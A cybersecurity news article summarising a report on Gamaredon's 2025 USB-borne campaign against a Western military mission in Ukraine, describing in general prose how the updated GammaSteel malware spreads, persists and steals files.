HQ/EMEAFind out how we can help your business
Russian state-backed cyber group Gamaredon has launched a recent wave of attacks against a Western military mission operating in Ukraine, according to a recent report. The campaign, which began in February 2025 and lasted through March, relied on the use of removable drives to infect systems with an updated version of its data-stealing malware known as GammaSteel.
Investigators believe that Gamaredon gained initial access to targeted systems using malicious [.]LNK shortcut files placed on USB drives.
Once the infected drive was inserted into a computer, the shortcut triggered a heavily obfuscated script. This script ran two main components: one handled command and control communication by connecting to servers using legitimate services such as Cloudflare, and the other enabled the malware to spread to other removable and network drives by dropping more LNK files and hiding important system folders to mask the infection.
Researchers noticed a change in tactics from the hacking group. Gamaredon appears to have moved away from traditional VBS scripts in favour of PowerShell-based tools, which offer more flexibility and easier evasion of detection. The group has also begun using legitimate system utilities like ‘certutil.exe’ to hash stolen files and relies on PowerShell web requests for data exfiltration. If those attempts fail, the malware falls back on using cURL over the Tor network to transmit stolen documents.
The final payload used in the campaign is a stealthy PowerShell version of GammaSteel that resides in the Windows Registry. It can collect a wide range of file types such as DOC, PDF, XLS, and TXT from locations like the Desktop, Documents, and Downloads folders. The malware also gathers screenshots and system information, including installed antivirus software and running processes.
To ensure persistence, Gamaredon adds a key to the Windows Run registry path, allowing the malware to execute every time the infected system starts up. Despite being considered less sophisticated than other Russian state-sponsored groups, Gamaredon has continued to improve its methods, making it a growing concern for Western defence networks.
Researchers warn that Gamaredon’s increased use of obfuscation, combined with its consistent targeting of military organisations, underscores the ongoing threat it poses, especially given the group’s persistence and evolving techniques.
